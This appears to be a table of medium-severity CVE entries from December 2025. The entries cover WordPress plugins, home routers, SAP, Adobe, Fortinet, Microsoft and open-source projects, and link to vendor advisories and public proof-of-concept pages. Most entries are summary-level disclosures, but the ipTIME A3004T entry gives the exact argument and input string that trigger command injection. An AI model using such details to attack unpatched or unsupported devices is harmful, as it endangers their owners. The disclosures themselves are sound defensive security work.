| Tenda--AC9 | A vulnerability was determined in Tenda AC9 15.03.05.14_multi. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/DownloadCfg.jpg of the component Configuration File Handler. This manipulation causes information disclosure. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-09 | 5.3 | CVE-2025-14286 | VDB-334874 | Tenda AC9 Configuration File DownloadCfg.jpg information disclosure VDB-334874 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702723 | Tenda AC9 V1.0 V15.03.05.14_multi Information Disclosure https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN11.md https://www.tenda.com.cn/ |
| dugudlabs--Eyewear prescription form | The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing capability checks on the RemoveItems AJAX action. This makes it possible for unauthenticated attackers to delete arbitrary WooCommerce product categories, including all of their child categories, via the 'catIds' parameter. | 2025-12-13 | 5.3 | CVE-2025-14365 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b85fc103-20e5-4599-8ed5-5bd5d9c447ee?source=cve https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L74 https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L326 |
| dugudlabs--Eyewear prescription form | The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing authorization checks on the SubmitCatProductRequest AJAX action. This makes it possible for unauthenticated attackers to create arbitrary WooCommerce products with custom names, prices, and category assignments via the 'Name', 'Price', and 'Parent' parameters. | 2025-12-13 | 5.3 | CVE-2025-14366 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0f21d7a2-3b4f-487f-a64a-b963427233b3?source=cve https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L71 https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L369 |
| corsonr--Easy Theme Options | The Easy Theme Options plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0. This is due to missing authorization checks in the eto_import_settings function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import arbitrary plugin settings via the 'eto_import_settings' parameter. | 2025-12-13 | 5.3 | CVE-2025-14367 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8405e80d-fd72-4d87-b08a-19a686eb2982?source=cve https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L277 https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L282 |
| ays-pro--Secure Copy Content Protection and Content Locking | The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to sensitive information exposure due to storage of exported CSV files in a publicly accessible directory with predictable filenames in all versions up to, and including, 4.9.2. This makes it possible for unauthenticated attackers to access sensitive user data including emails, IP addresses, usernames, roles, and location data by directly accessing the exported CSV file. | 2025-12-12 | 5.3 | CVE-2025-14442 | https://www.wordfence.com/threat-intel/vulnerabilities/id/72b95777-d17b-4504-95fd-c83b18106b9e?source=cve https://wordpress.org/plugins/secure-copy-content-protection/#developers https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.0/admin/class-secure-copy-content-protection-admin.php#L557 https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L560 |
| pcantoni--AnnunciFunebri Impresa | The AnnunciFunebri Impresa plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the annfu_reset_options() function in all versions up to, and including, 4.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all 29 plugin options, effectively resetting the plugin to its default state. | 2025-12-13 | 5.3 | CVE-2025-14447 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b9ea2a2-34af-408c-91ee-6d5fd9431529?source=cve https://plugins.trac.wordpress.org/browser/annuncifunebri-onoranza/trunk/functions.inc.php#L845 https://plugins.trac.wordpress.org/browser/annuncifunebri-onoranza/tags/4.7.0/functions.inc.php#L845 |
| EFM--ipTIME A3004T | A weakness has been identified in EFM ipTIME A3004T 14.19.0. This vulnerability affects the function show_debug_screen of the file /sess-bin/timepro.cgi of the component Administrator Password Handler. This manipulation of the argument aaksjdkfj with the input !@dnjsrureljrm*& causes command injection. The attack is possible to be carried out remotely. The complexity of an attack is rather high. It is stated that the exploitability is difficult. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 5 | CVE-2025-14485 | VDB-335768 | EFM ipTIME A3004T Administrator Password timepro.cgi show_debug_screen command injection VDB-335768 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702655 | EFM NETWORKS CO., LTD. ipTime A3004T 14.19.0 Command Injection https://www.yuque.com/yuqueyonghuexlgkz/zepczx/mf0uog9s2ycay4g2?singleDoc https://pan.baidu.com/s/12VsWYY-bf2-Kfufbs2dlXw?pwd=drt |
| Yalantis--uCrop | A vulnerability was determined in Yalantis uCrop 2.2.11. This affects the function UCropActivity of the file AndroidManifest.xml. Executing manipulation can lead to improper export of android application components. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 5.3 | CVE-2025-14517 | VDB-335855 | Yalantis uCrop AndroidManifest.xml UCropActivity improper export of android application components VDB-335855 | CTI Indicators (IOB, IOC, IOA) Submit #702811 | uCrop Android Library uCrop 2.2.11 Intent Spoofing https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446?source=copy_link https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446#469832583e0444dcb3d08b0ca661d1c6 |
| baowzh--hfly | A weakness has been identified in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. Impacted is an unknown function of the file /admin/index.php/datafile/delfile. This manipulation of the argument filename causes path traversal. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. This product adopts a rolling release strategy to maintain continuous delivery The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 5.4 | CVE-2025-14520 | VDB-335858 | baowzh hfly delfile path traversal VDB-335858 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702948 | GitHub hfly 1.0 Arbitrary file deleteing https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20delfile%20filename%20Arbitrary%20file%20delete.md |
| D-Link--DIR-803 | A vulnerability was detected in D-Link DIR-803 up to 1.04. Impacted is an unknown function of the file /getcfg.php of the component Configuration Handler. The manipulation of the argument AUTHORIZED_GROUP results in information disclosure. The attack may be performed from remote. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-11 | 5.3 | CVE-2025-14528 | VDB-335869 | D-Link DIR-803 Configuration getcfg.php information disclosure VDB-335869 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703150 | D-Link DIR-803 1.04 and earlier Authorization Bypass https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md#poc https://www.dlink.com/ |
| rang501--Shortcode Ajax | The The Shortcode Ajax plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2025-12-13 | 5.4 | CVE-2025-14539 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8e2a994f-7a42-4ccb-8fa0-77107ba1150c?source=cve https://plugins.trac.wordpress.org/browser/shortcode-ajax/trunk/shortcode-ajax.php#L29 |
| haxxorsid--Stock-Management-System | A weakness has been identified in haxxorsid Stock-Management-System up to fbbbf213e9c93b87183a3891f77e3cc7095f22b0. This affects an unknown function of the file /api/employees. Executing manipulation can lead to missing authentication. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-12 | 5.3 | CVE-2025-14567 | VDB-336191 | haxxorsid Stock-Management-System employees missing authentication VDB-336191 | CTI Indicators (IOB, IOC, IOA) Submit #703879 | haxxorsid stock-management-system 1.0 Improper Access Controls https://github.com/ixpqxi/CVE_LIST/blob/master/stock_management_system/access_control_vulnerability.md |
| ggml-org--whisper.cpp | A vulnerability was detected in ggml-org whisper.cpp up to 1.8.2. Affected is the function read_audio_data of the file /whisper.cpp/examples/common-whisper.cpp. The manipulation results in use after free. The attack requires a local approach. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-12 | 5.3 | CVE-2025-14569 | VDB-336193 | ggml-org whisper.cpp common-whisper.cpp read_audio_data use after free VDB-336193 | CTI Indicators (IOB, IOC, IOA) Submit #703886 | ggerganov whisper.cpp v1.8.2 Free of Memory not on the Heap https://github.com/ggml-org/whisper.cpp/issues/3501 https://github.com/oneafter/InvalidFree/blob/main/repro |
| villatheme--HAPPY Helpdesk Support Ticket System | The HAPPY - Helpdesk Support Ticket System plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the 'submit_form_reply' AJAX action in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit replies to arbitrary support tickets by manipulating the 'happy_topic_id' parameter, regardless of whether they are the ticket owner or have been assigned to the ticket. | 2025-12-13 | 5.3 | CVE-2025-14581 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3967b5ce-f0f8-4620-8883-0857aeee8f8b?source=cve https://plugins.trac.wordpress.org/browser/happy-helpdesk-support-ticket-system/trunk/inc/happy-replies.php#L585 https://plugins.trac.wordpress.org/browser/happy-helpdesk-support-ticket-system/tags/1.0.9/inc/happy-replies.php#L585 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417847%40happy-helpdesk-support-ticket-system&new=3417847%40happy-helpdesk-support-ticket-system&sfp_email=&sfph_mail= |
| tiny-rdm--Tiny RDM | A security vulnerability has been detected in tiny-rdm Tiny RDM up to 1.2.5. Affected by this vulnerability is the function pickle.loads of the file pickle_convert.go of the component Pickle Decoding. The manipulation leads to deserialization. The attack can be initiated remotely. A high degree of complexity is needed for the attack. The exploitation appears to be difficult. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-13 | 5 | CVE-2025-14606 | VDB-336282 | tiny-rdm Tiny RDM Pickle Decoding pickle_convert.go pickle.loads deserialization VDB-336282 | CTI Indicators (IOB, IOC, IOA) Submit #704138 | tiny-rdm Tiny RDM 1.2.5 Insecure Deserialization https://github.com/tiny-craft/tiny-rdm/issues/512 |
| Jehovahs Witnesses--JW Library App | A vulnerability has been found in Jehovahs Witnesses JW Library App up to 15.5.1 on Android. Affected is an unknown function of the component org.jw.jwlibrary.mobile.activity.SiloContainer. Such manipulation leads to path traversal. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. | 2025-12-13 | 5.3 | CVE-2025-14617 | VDB-336303 | Jehovahs Witnesses JW Library App org.jw.jwlibrary.mobile.activity.SiloContainer path traversal VDB-336303 | CTI Indicators (IOB, IOC, TTP) Submit #705077 | Jehovah’s Witnesses(https://www.jw.org/finder?docid=802013031) JW Library APP (org.jw.jwlibrary.mobile) V15.5.1 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/issues/1 |
| DecoCMS--Mesh | A flaw has been found in DecoCMS Mesh up to 1.0.0-alpha.31. Affected by this vulnerability is the function createTool of the file packages/sdk/src/mcp/teams/api.ts of the component Workspace Domain Handler. This manipulation of the argument domain causes improper access controls. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been published and may be used. Upgrading to version 1.0.0-alpha.32 addresses this issue. Patch name: 5f7315e05852faf3a9c177c0a34f9ea9b0371d3d. It is recommended to upgrade the affected component. | 2025-12-14 | 5.6 | CVE-2025-14660 | VDB-336392 | DecoCMS Mesh Workspace Domain api.ts createTool access control VDB-336392 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713741 | Deco deco-mesh runtime v1.0.0-alpha.31 Improper Access Controls https://github.com/decocms/mesh/pull/1967 https://github.com/decocms/mesh/pull/1967#issuecomment-3622379237 https://github.com/decocms/mesh/pull/1967#issue-3700934099 https://github.com/decocms/mesh/commit/5f7315e05852faf3a9c177c0a34f9ea9b0371d3d https://github.com/decocms/mesh/releases/tag/runtime-v1.0.0-alpha.32 |
| Siemens--Gridscale X Prepay | A vulnerability has been identified in Gridscale X Prepay (All versions < V4.2.1). The affected application is vulnerable to user enumeration due to distinguishable responses. This could allow an unauthenticated remote attacker to determine if a user is valid or not, enabling a brute force attack with valid users. | 2025-12-09 | 5.3 | CVE-2025-40806 | https://cert-portal.siemens.com/productcert/html/ssa-356310.html |
| SAP_SE--SAPUI5 framework (Markdown-it component) | SAPUI5 (and OpenUI5) packages use outdated 3rd party libraries with known security vulnerabilities. When markdown-it encounters special malformed input, it fails to terminate properly, resulting in an infinite loop. This Denial of Service via infinite loop causes high CPU usage and system unresponsiveness due to a blocked processing thread. This vulnerability has no impact on confidentiality or integrity but has a high impact on system availability. | 2025-12-09 | 5.9 | CVE-2025-42873 | https://me.sap.com/notes/3676970 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Enterprise Search for ABAP | Due to a missing authorization check in SAP Enterprise Search for ABAP, an attacker with high privileges may read and export the contents of database tables into an ABAP report. This could lead to a high impact on data confidentiality and a low impact on data integrity. There is no impact on application's availability. | 2025-12-09 | 5.5 | CVE-2025-42891 | https://me.sap.com/notes/3659117 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP BusinessObjects Business Intelligence Platform | SAP BusinessObjects Business Intelligence Platform lets an unauthenticated remote attacker send crafted requests through the URL parameter that controls the login page error message. This can cause the server to fetch attacker-supplied URLs, resulting in low impact to confidentiality and integrity, and no impact to availability. | 2025-12-09 | 5.4 | CVE-2025-42896 | https://me.sap.com/notes/3651390 https://url.sap/sapsecuritypatchday |
| bannersky--BSK PDF Manager | The BSK PDF Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 5.5 | CVE-2025-4970 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3cf1983b-4cb7-4738-9f19-2c530a9939e0?source=cve https://wordpress.org/plugins/bsk-pdf-manager/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3405989%40bsk-pdf-manager&new=3405989%40bsk-pdf-manager&sfp_email=&sfph_mail= |
| Fortinet--FortiSandbox | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an attacker to perform an XSS attack via crafted HTTP requests. | 2025-12-09 | 5.3 | CVE-2025-54353 | https://fortiguard.fortinet.com/psirt/FG-IR-25-477 |
| Meta--react-server-dom-webpack | An information leak vulnerability exists in specific configurations of React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. A specifically crafted HTTP request sent to a vulnerable Server Function may unsafely return the source code of any Server Function. Exploitation requires the existence of a Server Function which explicitly or implicitly exposes a stringified argument. | 2025-12-11 | 5.3 | CVE-2025-55183 | https://www.facebook.com/security/advisories/cve-2025-55183 https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components |
| PowerDNS--Recursor | An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, then send a query with qtype set to ANY. | 2025-12-09 | 5.3 | CVE-2025-59029 | https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2025-07.html |
| Pegasystems--Pega Infinity | Pega Platform versions 7.1.0 through Infinity 25.1.0 are affected by a User Enumeration. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not. This only applies to deprecated basic-authentication feature and other more secure authentication mechanisms are recommended. A fix is being provided in the 24.1.4, 24.2.4, and 25.1.1 patch releases. Please note: Basic credentials authentication service type is deprecated started in 24.2 version: https://docs.pega.com/bundle/platform/page/platform/release-notes/security/whats-new-security-242.html. | 2025-12-10 | 5.3 | CVE-2025-62181 | https://support.pega.com/support-doc/pega-security-advisory-j25-vulnerability-remediation-note |
| c-ares--c-ares | c-ares is an asynchronous resolver library. Versions 1.32.3 through 1.34.5 terminate a query after maximum attempts when using read_answer() and process_answer(), which can cause a Denial of Service. This issue is fixed in version 1.34.6. | 2025-12-08 | 5.9 | CVE-2025-62408 | https://github.com/c-ares/c-ares/security/advisories/GHSA-jq53-42q6-pqr5 https://github.com/c-ares/c-ares/commit/714bf5675c541bd1e668a8db8e67ce012651e618 |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Windows Defender Firewall Service allows an authorized attacker to disclose information locally. | 2025-12-09 | 5.5 | CVE-2025-62468 | Windows Defender Firewall Service Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Integer underflow (wrap or wraparound) in Windows Hyper-V allows an authorized attacker to deny service over a network. | 2025-12-09 | 5.3 | CVE-2025-62567 | Windows Hyper-V Denial of Service Vulnerability |
| Fortinet--FortiOS | An insufficient session expiration vulnerability [CWE-613] in Fortinet FortiOS 7.4.0, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions allows attacker to maintain access to network resources via an active SSLVPN session not terminated after a user's password change under particular conditions outside of the attacker's control | 2025-12-09 | 5.3 | CVE-2025-62631 | https://fortiguard.fortinet.com/psirt/FG-IR-25-411 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64541 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64543 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64544 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64545 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64546 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64547 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64548 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64549 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64550 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64551 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64553 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64554 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64555 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64556 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64557 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64558 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64559 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64560 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64562 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64563 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64564 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64565 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64566 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64569 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64572 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64574 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64575 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64576 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
